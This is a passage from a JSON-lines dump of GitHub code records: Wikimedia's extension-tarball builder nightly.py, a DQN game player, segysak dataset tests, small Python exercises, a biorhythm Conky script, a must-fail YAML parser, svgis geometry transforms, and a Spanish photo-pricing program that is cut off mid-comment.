conf['LOG_FILE']\n self.REPO_TYPE = repo_type\n self.EXT_PATH = os.path.join(self.SRC_PATH, self.REPO_TYPE)\n self.COMPOSER = conf.get('COMPOSER')\n self._repo_list = None\n self._extension_config = None\n self.force = force\n self.session = requests.Session()\n\n @property\n def repo_list(self):\n \"\"\"\n Lazy-load the list of all extensions\n \"\"\"\n if self._repo_list is None:\n self._repo_list = self.fetch_all_repos()\n return self._repo_list\n\n def fetch_all_repos(self):\n \"\"\"\n Does an API request to get the complete list of extensions.\n Do not call directly.\n \"\"\"\n logging.debug('Fetching list of all %s...' % self.REPO_TYPE)\n data = {\n 'action': 'query',\n 'list': 'extdistrepos',\n 'format': 'json'\n }\n r = self.session.get(self.API_URL, params=data)\n r.raise_for_status()\n return r.json()['query']['extdistrepos'][self.REPO_TYPE]\n\n @property\n def supported_versions(self):\n \"\"\"\n Lazy-load the list of supported branches\n \"\"\"\n if self._extension_config is None:\n self.fetch_extension_config()\n return self._extension_config['snapshots']\n\n def fetch_extension_config(self):\n \"\"\"\n Fetch the ExtensionDistributor configuration from the API\n Do not call this directly.\n \"\"\"\n logging.debug('Fetching ExtensionDistributor config from API...')\n data = {\n 'action': 'query',\n 'meta': 'siteinfo',\n 'format': 'json',\n }\n r = self.session.get(self.API_URL, params=data)\n r.raise_for_status()\n resp = r.json()\n self._extension_config = resp['query']['general']['extensiondistributor']\n\n return {\n 'versions': resp['query']['general']['extensiondistributor']['snapshots'],\n 'extension-list': resp['query']['general']['extensiondistributor']['list']\n }\n\n def init(self):\n \"\"\"\n Does basic initialization\n \"\"\"\n # Set up logging\n logging.basicConfig(\n filename=self.LOG_FILE,\n level=logging.DEBUG,\n format='%(asctime)s %(levelname)s:%(message)s'\n )\n\n # Check to make sure nightly.py isn't already running\n if os.path.exists(self.PID_FILE):\n with open(self.PID_FILE, 'r') as f:\n old_pid = f.read()\n\n if self.check_pid(int(old_pid)):\n logging.warning('Another process of nightly.py is still running, quitting this one')\n quit()\n\n self.create_pid_file()\n\n # Init some directories we'll need\n if not os.path.isdir(self.EXT_PATH):\n self.shell_exec(['mkdir', '-p', self.EXT_PATH])\n if not os.path.isdir(self.DIST_PATH):\n self.shell_exec(['mkdir', '-p', self.DIST_PATH])\n\n def shell_exec(self, args, **kwargs):\n \"\"\"\n Shortcut wrapper to execute a shell command\n\n >>> self.shell_exec(['ls', '-l'])\n \"\"\"\n return subprocess.check_output(args, **kwargs).decode()\n\n def update_extension(self, ext):\n \"\"\"\n Fetch an extension's updates, and\n create new tarballs if needed\n \"\"\"\n full_path = os.path.join(self.EXT_PATH, ext)\n logging.info('Starting update for %s' % ext)\n repo_url = self.GIT_URL % ext\n if not os.path.exists(full_path):\n os.chdir(self.EXT_PATH)\n logging.debug('Cloning %s' % ext)\n self.shell_exec(['git', 'clone', repo_url, ext])\n pass\n for branch in self.supported_versions:\n os.chdir(full_path)\n logging.info('Creating %s for %s' % (branch, ext))\n # In case GIT_URL has changed\n self.shell_exec(['git', 'remote', 'set-url', 'origin', repo_url])\n # Update remotes\n self.shell_exec(['git', 'fetch'])\n try:\n # Could fail if repo is empty\n self.shell_exec(['git', 'reset', '--hard', 'origin/master'])\n # Reset everything!\n self.shell_exec(['git', 'clean', '-ffdx'])\n # Checkout the branch\n self.shell_exec(['git', 'checkout', 'origin/%s' % branch])\n except subprocess.CalledProcessError:\n # Just a warning because this is expected for some extensions\n logging.warning('could not checkout origin/%s' % branch)\n continue\n # Reset everything, again.\n self.shell_exec(['git', 'clean', '-ffd'])\n # Sync submodules in case their urls have changed\n self.shell_exec(['git', 'submodule', 'sync'])\n # Update them, initializing new ones if needed\n self.shell_exec(['git', 'submodule', 'update', '--init'])\n # Gets short hash of HEAD\n rev = self.shell_exec(['git', 'rev-parse', '--short=7', 'HEAD']).strip()\n tarball_fname = '%s-%s-%s.tar.gz' % (ext, branch, rev)\n if not self.force and os.path.exists(os.path.join(self.DIST_PATH, tarball_fname)):\n logging.debug('No updates to branch, tarball already exists.')\n continue\n if self.COMPOSER and os.path.exists('composer.json'):\n with open('composer.json') as f_composer:\n d_composer = json.load(f_composer)\n if 'require' in d_composer:\n logging.debug('Running composer install for %s' % ext)\n try:\n self.shell_exec([self.COMPOSER, 'install', '--no-dev', '--ignore-platform-reqs'])\n except subprocess.CalledProcessError:\n logging.error(traceback.format_exc())\n logging.error('composer install failed')\n # Create gitinfo.json to be read/displayed by Special:Version\n git_info = {}\n with open('.git/HEAD') as f_head:\n head = f_head.read()\n if head.startswith('ref:'):\n head = head[5:] # Strip 'ref :'\n git_info['head'] = head\n # Get the SHA-1\n git_info['headSHA1'] = self.shell_exec(['git', 'rev-parse', 'HEAD'])\n git_info['headCommitDate'] = self.shell_exec(['git', 'show', '-s', '--format=format:%ct', 'HEAD'])\n if head.startswith('refs/heads'):\n gi_branch = head.split('/')[-1]\n else:\n gi_branch = head\n git_info['branch'] = gi_branch\n git_info['remoteURL'] = self.GIT_URL % ext\n with open('gitinfo.json', 'w') as f:\n json.dump(git_info, f)\n\n # TODO: Stop writing this file now that we have gitinfo.json\n # Create a 'version' file with basic info about the tarball\n with open('version', 'w') as f:\n f.write('%s: %s\\n' % (ext, branch))\n f.write(self.shell_exec(['date', '+%Y-%m-%dT%H:%M:%S']) + '\\n') # TODO: Do this in python\n f.write(rev + '\\n')\n old_tarballs = glob.glob(os.path.join(self.DIST_PATH, '%s-%s-*.tar.gz' % (ext, branch)))\n logging.debug('Deleting old tarballs...')\n for old in old_tarballs:\n # FIXME: Race condition, we should probably do this later on...\n os.unlink(old)\n os.chdir(self.EXT_PATH)\n # Finally, create the new tarball\n self.shell_exec(['tar', '--exclude', '.git', '-czhPf', tarball_fname, ext])\n logging.debug('Moving new tarballs into dist/')\n tarballs = glob.glob(os.path.join(self.EXT_PATH, '*.tar.gz'))\n for tar in tarballs:\n fname = tar.split('/')[-1]\n os.rename(tar, os.path.join(self.DIST_PATH, fname))\n logging.info('Finished update for %s' % ext)\n\n if random.randint(0, 99) == 0:\n # Run git gc every 100th process (statistically)\n self.shell_exec(['git', 'gc'], cwd=full_path)\n\n def check_pid(self, pid):\n \"\"\"\n Checks whether the given pid is running\n \"\"\"\n try:\n # This doesn't actually kill it, just checks if it is running\n os.kill(pid, 0)\n except OSError:\n # Not running\n return False\n else:\n # So it must be running\n return True\n\n def create_pid_file(self):\n \"\"\"\n Creates a pid file with the current pid\n \"\"\"\n with open(self.PID_FILE, 'w') as f:\n f.write(str(os.getpid()))\n logging.info('Creating pid file')\n\n def run(self, repos=None):\n self.init()\n if not repos:\n repos = self.repo_list\n logging.info('Processing %s %s' % (len(repos), self.REPO_TYPE))\n logging.info('Starting update of all %s...' % self.REPO_TYPE)\n for repo in repos:\n try:\n self.update_extension(repo)\n except KeyboardInterrupt:\n logging.error(traceback.format_exc())\n sys.exit(1)\n except Exception:\n logging.error(traceback.format_exc())\n logging.error('Updating %s failed, skipping' % repo)\n logging.info('Finished update of all %s!' % self.REPO_TYPE)\n\n\ndef main():\n # Load our config from JSON\n conf = None\n skins = '--skins' in sys.argv\n etc_path = '/etc/skindist.conf' if skins else '/etc/extdist.conf'\n local_fname = 'skinconf.json' if skins else 'conf.json'\n if os.path.exists(etc_path):\n with open(etc_path, 'r') as f:\n conf = json.load(f)\n elif os.path.exists(os.path.join(os.path.dirname(__file__), local_fname)):\n with open(os.path.join(os.path.dirname(__file__), local_fname), 'r') as f:\n conf = json.load(f)\n else:\n print('extdist is not configured properly.')\n quit()\n if '--all' in sys.argv:\n repos = []\n elif skins:\n repos = ['Vector']\n else:\n repos = ['VisualEditor']\n for arg in sys.argv:\n if arg.startswith('--repo'):\n repos.append(arg.split('=', 1)[1])\n repo_type = 'skins' if skins else 'extensions'\n force = '--force' in sys.argv\n generator = TarballGenerator(conf, repo_type=repo_type, force=force)\n generator.run(repos=repos)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"wikimedia/labs-tools-extdist","sub_path":"nightly.py","file_name":"nightly.py","file_ext":"py","file_size_in_byte":11493,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"43285861310","text":"import time\n\nimport numpy as np\nfrom constants import LEVEL2, ACTIONS, GameStatus\nfrom Level import Level\nfrom WYB import WatchYourBack\nfrom map_utilities import clear_console_output, encode_map_numeric, print_map\nfrom dql import DQNAgent\n\ngame = WatchYourBack(Level(LEVEL2))\nstate_size = len(LEVEL2)**2\nagent = DQNAgent(state_size, 4)\nagent.epsilon = 0\nagent.load(\"./save/level2.h5\")\n\nclear_console_output()\nprint_map(game.level.level)\ntime.sleep(2)\n\nwhile game.status == GameStatus.ONGOING:\n state = encode_map_numeric(game.level.level)\n player_move = agent.act(np.reshape(state, [1, state_size]))\n\n game.move_player(ACTIONS[player_move])\n clear_console_output()\n print_map(game.level.level)\n time.sleep(2)\n\n game.move_enemies()\n clear_console_output()\n print_map(game.level.level)\n time.sleep(2)\n\nprint('Result:', game.status)","repo_name":"yortuc/backGame","sub_path":"trainer/dql_play.py","file_name":"dql_play.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"5303542727","text":"import numpy as np\n\nimport pytest\n\nfrom hypothesis import given, assume, settings\nfrom hypothesis.strategies import integers, text, floats, tuples, sampled_from\nfrom hypothesis.extra.numpy import arrays\n\nfrom segysak._seismic_dataset import (\n _check_vert_units,\n _check_input,\n _dataset_coordinate_helper,\n)\nfrom segysak._seismic_dataset import (\n create_seismic_dataset,\n create2d_dataset,\n create3d_dataset,\n)\n\nfrom segysak._keyfield import VerticalUnits, VerticalKeyField\n\n\nclass TestCheckers:\n \"\"\"\n Test data checking utilities\n \"\"\"\n\n def test_check_input_does_nothing_to_None(self):\n assert _check_input(None) is None\n\n @given(integers(0, 100000))\n def test_check_input_turns_int_into_array(self, i):\n assert len(_check_input(i)) == i\n\n def test_check_input_converts_to_array(self):\n assert isinstance(_check_input([0, 0]), np.ndarray)\n\n def test_check_input_raises_error_at_multidimensions(self):\n with pytest.raises(ValueError):\n _check_input([[0, 0]])\n\n @pytest.mark.parametrize(\"u\", list(VerticalUnits))\n def test_vertical_units_pass_checking(self, u):\n assert _check_vert_units(u) == u\n\n @given(text())\n def test_illegal_vertical_units_raise_errors(self, t):\n assume(t not in list(VerticalUnits))\n with pytest.raises(ValueError):\n _check_vert_units(t)\n\n @pytest.mark.parametrize(\"p\", list(VerticalKeyField.values()))\n def test_domains_pass_checking(self, p):\n _, domain = _dataset_coordinate_helper(None, p)\n assert p == domain\n\n @given(text())\n def test_illegal_domain_raise_errors(self, t):\n assume(t not in list(VerticalKeyField.values()))\n with pytest.raises(ValueError):\n _dataset_coordinate_helper(None, t)\n\n\nclass TestCreateSeismicDataset:\n \"\"\"\n Test creating a seismic dataset with various dimensions and sizes\n \"\"\"\n\n @given(integers(0, 10000), integers(0, 100000))\n def test_create_2D_seismic_dataset_with_integers(self, s, t):\n dataset = create_seismic_dataset(\n twt=s, depth=None, cdp=t, iline=None, xline=None, offset=None\n )\n assert len(dataset.dims) == 2\n assert dataset.dims[\"twt\"] == s\n\n @given(integers(0, 45))\n @settings(max_examples=10)\n def test_create_2D_seismic_dataset_with_offsets(self, o):\n dataset = create_seismic_dataset(\n twt=100, depth=None, cdp=1000, iline=None, xline=None, offset=o\n )\n assert len(dataset.dims) == 3\n\n @given(integers(0, 10000), integers(0, 100000), integers(0, 100000))\n def test_create_3D_seismic_dataset_with_integers(self, s, i, x):\n dataset = create_seismic_dataset(\n twt=None, depth=s, cdp=None, iline=i, xline=x, offset=None\n )\n assert len(dataset.dims) == 3\n assert dataset.dims[\"depth\"] == s\n\n @given(\n arrays(float, shape=integers(0, 10000), elements=floats(-1000, 1000)),\n integers(0, 10000),\n )\n def test_create_2D_seismic_dataset_with_arrays(self, a, t):\n dataset = create_seismic_dataset(\n twt=a, depth=None, cdp=t, iline=None, xline=None, offset=None\n )\n assert len(dataset.dims) == 2\n assert dataset.dims[\"twt\"] == len(a)\n\n @given(integers(0, 100))\n @settings(max_examples=10)\n def test_create_2D_seismic_dataset_with_multiple_dimensions(self, d):\n dims = {str(i): i for i in range(d)}\n dataset = create_seismic_dataset(\n twt=100, depth=None, cdp=1000, iline=None, xline=None, offset=None, **dims\n )\n assert len(dataset.dims) == d + 2\n\n def test_mutally_not_allowed_arguments(self):\n with pytest.raises(ValueError):\n ds = create_seismic_dataset(cdp=100, iline=100, xline=100)\n\n with pytest.raises(ValueError):\n ds = create_seismic_dataset(cdp=100, iline=100)\n\n with pytest.raises(ValueError):\n ds = create_seismic_dataset(cdp=100, xline=100)\n\n def test_mutually_required_arguments(self):\n\n with pytest.raises(ValueError):\n ds = create_seismic_dataset(iline=100)\n\n with pytest.raises(ValueError):\n ds = create_seismic_dataset(xline=100)\n\n\nclass TestCreate2DDataset:\n \"\"\"\n Test creating 2D datasets with various shapes\n \"\"\"\n\n @given(integers(1, 10000), integers(0, 100), integers(1, 100))\n def test_create_2D_dataset_custom_sampling(self, s, f, r):\n dataset = create2d_dataset(\n dims=(100, s), first_sample=f, sample_rate=r, vert_domain=\"TWT\"\n )\n assert dataset.twt.data.max() == f + s * r - r\n\n @given(integers(1, 10000), integers(0, 100), integers(1, 100))\n def test_create_2D_dataset_custom_cdp(self, t, f, s):\n dataset = create2d_dataset(dims=(t, 100), first_cdp=f, cdp_step=s)\n assert dataset.cdp.data.max() == f + s * t - s\n\n @given(integers(1, 10000), integers(0, 100), integers(1, 100), integers(0, 50))\n def test_create_2D_dataset_wfirstoffset(self, s, f, r, o):\n dataset = create2d_dataset(\n dims=(100, s, 5),\n first_cdp=f,\n cdp_step=s,\n sample_rate=r,\n first_offset=o,\n offset_step=10,\n )\n assert dataset.offset.data.max() == 4 * 10 + o\n\n\nclass TestCreate3DDataset:\n \"\"\"\n Test creating 3D datasets with various shapes\n \"\"\"\n\n @given(\n tuples(integers(1, 10000), integers(1, 10000), integers(0, 1000)),\n sampled_from(list(VerticalUnits)),\n )\n def test_create_full_stack_dataset(self, d, u):\n dataset = create3d_dataset(dims=d, vert_units=u)\n assert dataset.d3_domain == \"TWT\"\n assert dataset.measurement_system == u\n\n @given(\n integers(15, 60),\n floats(0, 15),\n floats(1, 15),\n sampled_from([\"TWT\", \"twt\", \"DEPTH\", \"depth\"]),\n )\n def test_create_angle_stack_dataset(self, o, f, s, d):\n dataset = create3d_dataset(\n (1000, 1000, 100, o), first_offset=f, offset_step=s, vert_domain=d\n )\n assert dataset.d3_domain == d.upper()\n assert len(dataset.dims) == 4\n","repo_name":"trhallam/segysak","sub_path":"tests/test_seismic_dataset.py","file_name":"test_seismic_dataset.py","file_ext":"py","file_size_in_byte":6149,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"32"} +{"seq_id":"3526773695","text":"def findReciprocal(Value):\r\n try:\r\n print(\"Value:-\", Value)\r\n r =1/Value\r\n print(\"The reciprocl of\",Value,\"is\",r,\"\\n\")\r\n\r\n except:\r\n print(\"you cannt find reciprocal of \",Value,\"\\n\")\r\n\r\n\r\nfindReciprocal(\"hello\")\r\nfindReciprocal(2)","repo_name":"Abhishek6625/python","sub_path":"try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"31942370719","text":"# 获取列表的一些基本信息\n\nlist1 = [9, 1, -4, 3, 7, 11, 3]\n\n#print('list1 =', len(list1))\n#print('list1.Max=', max(list1))\n#print('list1.Min=', min(list1))\n# print('list1.3={}'.format(list1.count(3)))\n\n# append 结尾插入\n# insert 中间插入\n# remove 删除\n# reverse 翻转\n# sort 排序 (不改为正序,reverse为倒序)\n\n\n# 列表的改变\n\nlist2 = ['a', 'c', 'd']\n\n# 给list2结尾添加一个新元素 'e'\nlist2.append('e')\n#print('list2=', list2)\n\n\n# 在list2的'a'和'c'之间插入一个 'b'\nlist2.insert(1, 'b')\n#print('list2=', list2)\n\n# 删除list2里的'b'\nlist2.remove('b')\n#print('list2=', list2)\n\n\n# 更改元素\nlist2[0] = '1'\n#print('list2=', list2)\n\n\n#a = '123'\n#a[0] = 'a'\n#a = 'abc'\n\n\n# 列表翻转\nlist3 = [1, 2, 3]\nlist3.reverse()\n#print('list3=', list3)\n\n\n# 列表排序\n\nlist4 = [9, 1, -4, 3, 7, 11, 3]\nlist4.sort(reverse=True)\n#print('list4=', list4)\n\n\nlist5 = [1, 'a', 3, [1, 2], 'c']\n\n# print(max(list5))\nprint(format(list5.count(1)))\nlist5.append('b')\nlist5.insert(1, 2)\nlist5.remove('b')\nlist5[2] = 3\nlist5[3] = 4\n\nlist5.reverse() # 先排字符串>列表>整数\n# list5.sort(reverse=True) 无法倒序\nprint(list5)\n","repo_name":"op5280546/Python-Test","sub_path":"列表和元組/list_methods.py","file_name":"list_methods.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"296008374","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nShow biorhythm warnings like the KOSMOS-1 calculator with Conky\nP: physical\nE: emotional\nI: intellectual\n\n2013-08-23\n\nRed: critical days\nOrange: mini-critical days\nSee http://decodesystems.com/kosmos-1.html\n\nDominant cycle is shown in parentheses.\n\nargument 1: number of days in advance (today = 0)\n\n\"\"\"\n\ndd,mm,yy=1,1,1990\n\nfrom datetime import date\nfrom sys import argv\nfrom math import sin,pi\n\nt0 = date(yy,mm,dd).toordinal()\nt1 = date.today().toordinal()\n\nwa=(\n((1,12,13),(7,18)),\n((1,15),(8,22)),\n((1,17,18),(9,26))\n)\n\ns = {'_': '${color green}●${color}', 'y': '${color yellow}●${color}', 'r': '${color red}●${color}'}\n\nout = \"\"\n\nt = t1 + int(argv[1])\n\nw = ['_','_','_']\no = ['*','*','*']\nperc = [0,0,0]\nfor c in range(3):\n p = 23+5*c\n perc[c] = 100.*sin(2*pi*(t-t0)/p)\n v = ((t-t0) % p)+1\n if (v-1) <= p/2:\n o[c] = 'H'\n if (v-1) >= p/2:\n o[c] = 'T'\n if v in wa[c][0]:\n w[c] = 'r'\n o[c] = 'K'\n if v in wa[c][1]:\n w[c] = 'y'\nfor x in w:\n out += s[x] + ' '\nfor x in o:\n out += x + ' '\n\nif perc[0]>perc[1] and perc[0]>perc[2]:\n out += '(P)'\nelif perc[1]>perc[0] and perc[1]>perc[2]:\n out += '(E)'\nelse:\n out += '(I)'\n\nprint(out)\n","repo_name":"trivedisorabh/PyoRhythm","sub_path":"conky/bioconky.py","file_name":"bioconky.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"70883799132","text":"import re\nimport yaml\n\nMF_ID_KEYWORD = \"MF\"\nMF_COMMENT_KEYWORD = \"Comment\"\nMF_SIGNATURE = \"#MF:\"\nMF_PATTERN = re.compile(\"([ \\t]*#MF:.*(\\r\\n?|\\n)([ \\t]*#([^M][^F][^:])?.*(\\r\\n?|\\n))*)\")\n\ndef occurence_ranges(occs, text):\n pairs = []\n for occ in occs:\n pos = text.find(occ, pairs[-1][-1] if len(pairs) > 0 else None)\n if pos >= 0:\n pairs.append((pos, pos+len(occ)))\n return pairs\n\ndef line_ranges(text):\n return occurence_ranges(text.splitlines(True), text)\n\ndef pattern_occurences(regexp, text):\n def filter_tuples(match):\n if isinstance(match, tuple):\n return match[0]\n return match\n\n matches = map(filter_tuples,regexp.findall(text))\n return occurence_ranges(matches, text)\n\nclass InplaceMustfailParser(object):\n \"\"\"\n MF is the commented YAML text, having the following convention:\n MF - field for MF id\n Comment - field for comments\n Other fields may be introduced in later versions\n\n Example 1:\n #MF: BUG-45\n #Comment: |\n # first line of comment\n # last line\n\n Example 2:\n #MF: http://mybugtracker/ID33\n #Comment: bla bla bla\n \"\"\"\n\n def __init__(self, feature):\n self.feature_text = feature.original_string\n self.mf_occs = pattern_occurences(MF_PATTERN, feature.original_string)\n self.line_occs = line_ranges(feature.original_string)\n self.linenum2mf = self.__map_lines_mfs()\n self.mf_dict = self.__as_dict(feature)\n\n def __map_lines_mfs(self):\n def mf_on_line(mf, line):\n line_start, line_end = line\n mf_start, mf_end = mf\n mf_end = mf_end if mf_start == mf_end else mf_end-1\n return line_start <= mf_end < line_end\n\n nline2mf = {}\n try:\n nlines = enumerate(self.line_occs)\n n, line = next(nlines)\n for mf in self.mf_occs:\n while True:\n if mf_on_line(mf, line):\n nline2mf[n+1] = mf\n break\n n, line = next(nlines)\n except StopIteration:\n pass\n return nline2mf\n\n def __len__(self):\n return len(self.mf_dict)\n\n def __item_under_mf(self,linenum):\n return (linenum-1) in self.linenum2mf\n\n def __mf_text_for_line(self, linenum):\n start, end = self.linenum2mf[linenum-1]\n return self.feature_text[start:end]\n\n def __create_mf_item(self, pattern, mf_text, linenum):\n text = mf_text.replace(\"#\", \"\")\n d = yaml.load(text)\n result = {'pattern' : pattern}\n if MF_ID_KEYWORD in d:\n result[\"id\"] = d[MF_ID_KEYWORD]\n if MF_COMMENT_KEYWORD in d:\n result['comment'] = d[MF_COMMENT_KEYWORD]\n result['line'] = linenum\n return result\n\n def __check_add_mf(self, linenum, name, lst_to_add):\n if self.__item_under_mf(linenum):\n lst_to_add.append(\n self.__create_mf_item('.*?{name}.*?'.format(name=name),\n self.__mf_text_for_line(linenum),\n linenum))\n\n def as_dict(self):\n return self.mf_dict\n\n def __as_dict(self, feature):\n mf = {}\n mf_scenarios = []\n mf_steps = []\n mf_features = []\n\n self.__check_add_mf(feature.described_at.line, feature.name, mf_features)\n\n for scenario in feature.scenarios:\n self.__check_add_mf(scenario.described_at.line, scenario.name, mf_scenarios)\n for step in scenario.steps:\n self.__check_add_mf(step.described_at.line, step.sentence, mf_steps)\n\n if len(mf_features) > 0:\n mf['features'] = mf_features\n if len(mf_scenarios) > 0:\n mf['scenarios'] = mf_scenarios\n if len(mf_steps) > 0:\n mf['steps'] = mf_steps\n\n return {'MustFail': mf} if len(mf) > 0 else {}\n\n","repo_name":"griddynamics/bunch","sub_path":"lettuce_bunch/mustfail.py","file_name":"mustfail.py","file_ext":"py","file_size_in_byte":3925,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"38919071332","text":"# https://programmers.co.kr/learn/courses/30/lessons/12951\n# JadenCase 문자열 만들기\n\ndef solution(s):\n s = list(s)\n start = 0\n \n for i in range(len(s)):\n if start == 0 and s[i].isalpha():\n s[i] = s[i].upper()\n elif s[i].isalpha():\n s[i] = s[i].lower()\n if s[i] == \" \":\n start = 0\n else:\n start = start + 1\n\n return \"\".join(s)","repo_name":"miche715/Programmers-Algorithm","sub_path":"python/p_12951.py","file_name":"p_12951.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32756154905","text":"from functools import partial\n\ntry:\n from shapely.geometry import mapping, shape\n from shapely.geos import TopologicalError\nexcept ImportError:\n pass\ntry:\n import numpy as np\nexcept ImportError:\n pass\ntry:\n import visvalingamwyatt as vw\nexcept ImportError:\n pass\n\n\ndef clipper(bbox):\n \"\"\"\n Create a clipping function for a given bounding box.\n\n Args:\n bbox (tuple): bounding box\n\n Returns:\n function that will given geometries to input bounding box\n \"\"\"\n minx, miny, maxx, maxy = bbox\n bounds = {\n \"type\": \"Polygon\",\n \"coordinates\": [[(minx, miny), (minx, maxy), (maxx, maxy), (maxx, miny), (minx, miny)]],\n }\n try:\n bbox_shape = shape(bounds)\n\n def func(geometry):\n # This is technically only needed in Py3, but whatever.\n try:\n clipped = bbox_shape.intersection(shape(geometry))\n except (ValueError, TopologicalError):\n return geometry\n\n return mapping(clipped)\n\n except NameError:\n\n def func(geometry):\n return geometry\n\n return func\n\n\ndef clip(geometry, bounds):\n \"\"\"\n Clip a geometry to a bounding box. Equivalent to calling clipper(bounds)(geometry).\n\n Args:\n geometry (dict): geometry object\n bounds (tuple): bounding box\n\n Returns:\n (dict) geometry\n \"\"\"\n try:\n return clipper(bounds)(geometry)\n\n except NameError:\n return geometry\n\n\ndef simplifier(ratio):\n \"\"\"\n Create a simplification function, if visvalingamwyatt is available.\n Otherwise, return a noop function.\n\n Args:\n ratio (int): Between 1 and 99\n\n Returns:\n simplification function\n \"\"\"\n try:\n # put this first to get NameError out of the way\n simplify = vw.simplify_geometry\n\n if ratio is None or ratio >= 100 or ratio < 1:\n raise SvgisError(\"Invalid ratio\")\n\n return partial(simplify, ratio=ratio / 100.0)\n\n except (TypeError, ValueError, NameError):\n return None\n\n\ndef scale(coordinates, scalar=1):\n '''Scale a list of coordinates by a scalar. Only use with projected coordinates'''\n try:\n try:\n arr = np.array(coordinates, dtype=float)\n\n except TypeError:\n arr = np.array(list(coordinates), dtype=float)\n\n return arr * scalar\n\n except NameError:\n if isinstance(coordinates, tuple):\n return [coordinates[0] * scalar, coordinates[1] * scalar]\n\n return [(c[0] * scalar, c[1] * scalar) for c in coordinates]\n\n\ndef scale_rings(rings, factor=1):\n \"\"\"Apply scale() to a list of rings.\"\"\"\n return [scale(ring, factor) for ring in rings]\n\n\ndef scale_geom(geom, factor=1):\n \"\"\"\n Scale a geometry by a given factor\n\n Args:\n geom (dict): geojson-like dict\n factor (numeric): scale factor, default: 1\n \"\"\"\n if geom['type'] == 'MultiPolygon':\n geom['coordinates'] = [scale_rings(rings, factor) for rings in geom['coordinates']]\n\n elif geom['type'] in ('Polygon', 'MultiLineString'):\n geom['coordinates'] = scale_rings(geom['coordinates'], factor)\n\n elif geom['type'] in ('MultiPoint', 'LineString'):\n geom['coordinates'] = scale(geom['coordinates'], factor)\n\n elif geom['type'] == 'Point':\n geom['coordinates'] = scale(geom['coordinates'], factor)\n\n elif geom['type'] == 'GeometryCollection':\n geom['geometries'] = [scale_geom(i) for i in geom['geometries']]\n\n else:\n raise NotImplementedError(f\"Unsupported geometry type: {geom['type']}\")\n\n return geom\n","repo_name":"fitnr/svgis","sub_path":"src/svgis/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":3611,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"32"} +{"seq_id":"1961992544","text":"############################################################################################################################\n#PROGRAMA DE FOTOGRAFIAS\nimport re\ndef Fotografias():\n total = 0\n\n print(\"\\n######################################\\n#Bienvenido Al Sistema De Fotografias#\\n######################################\\n\")\n \n Cantidad_Fotos = int(input(\"\\nIngrese La Cantidad De Fotografias\\n\"))\n\n Tipo_Fotografia = input(\"\\nTipo de fotografía: a)Blanco y negro b)Color\\n\")\n Tipo_Fotografia = Tipo_Fotografia.upper()\n\n Tamaño_Foto = int(input(\"\\nTamaño de las fotografías: 1.-4 x 6 2.-6x8 3.-8x10 4.-10x12\\n\"))\n\n #EVALUAMOS SI EL TIPO DE LA FOTOGRAFIA ES A BLANCO Y NEGRO\n if Tipo_Fotografia == \"A\":\n \n #EVALUAMOS EL TAMAÑO DE LA FOTOGRAFIA SI SELECCIONA UNA OPCION NO DISPONIBLE MOSTRARA UN MENSAJE AL USUARIO\n if Tamaño_Foto == 1: \n total = (1.5 * Cantidad_Fotos)\n \n elif Tamaño_Foto == 2:\n total = (3.0 * Cantidad_Fotos)\n \n elif Tamaño_Foto == 3:\n total = (5.5 * Cantidad_Fotos)\n \n elif Tamaño_Foto == 4: \n total = (10.0 * Cantidad_Fotos)\n \n else:\n print(\"Opcion Seleccionada No Disponible\")\n\n #EVALUAMOS SI EL TIPO DE LA FOTOGRAFIA ES A COLOR\n elif Tipo_Fotografia == \"B\":\n\n #EVALUAMOS EL TAMAÑO DE LA FOTOGRAFIA SI SELECCIONA UNA OPCION NO DISPONIBLE MOSTRARA UN MENSAJE AL USUARIO\n if Tamaño_Foto == 1: \n total = (5.5 * Cantidad_Fotos)\n \n elif Tamaño_Foto == 2:\n total = (12.0 * Cantidad_Fotos)\n \n elif Tamaño_Foto == 3:\n total = (15.0 * Cantidad_Fotos)\n \n elif Tamaño_Foto == 4: \n total = (18.5 * Cantidad_Fotos)\n \n else:\n print(\"Opcion Seleccionada No Disponible\")\n\n #SI NO ES NI A BLANCO Y NEGRO NI A COLOR MOSTRARA MENSAJE DE OPCION NO DISPONIBLE\n else:\n print(\"Opcion Seleccionada No Disponible\") \n\n servicio = input(\"\\n¿El Servicio Será Impreso o por correo electrónico? [I / C]?:\\n\")\n servicio = servicio.upper()\n\n\n if servicio == \"I\":\n total = total + (total * 0.15)\n print(f\"TOTAL a pagar: $ {total} pesos\\n\") \n elif servicio == \"C\":\n \n #EVALUAMOS MEDIANTE EXPRESIONES REGULARES HACIENDO USO DE LA LIBRERIA \"re\" si la estructura corresponde a la de un correo electronico si no muestra un mensaje de correo no valido y solicita de nuevo el correo\n while True:\n print(\"\\nFavor de indicar el correo de envío:\\n\") \n correo = input()\n if re.match('^[(a-z0-9\\_\\-\\.)]+@[(a-z0-9\\_\\-\\.)]+\\.[(a-z)]{2,15}$',correo.lower()):\n print(f\"\\nLa Direccion De Correo A La Que Se enviara es: {correo}\")\n print(f\"\\nTOTAL a pagar: $ {total} pesos\\n\")\n else:\n print (\"*** DIRECCIóN DE CORREO NO VÁLIDA ***\")\n if re.match('^[(a-z0-9\\_\\-\\.)]+@[(a-z0-9\\_\\-\\.)]+\\.[(a-z)]{2,15}$',correo.lower()):break \n#######################################################################################################################################\n#PROGRAMA DE CALIFICACIONES\ndef Calificaciones(estudiantes):\n\n #VARIABLE PARA GUARDAR LAS CALIFICACIONES DE LOS 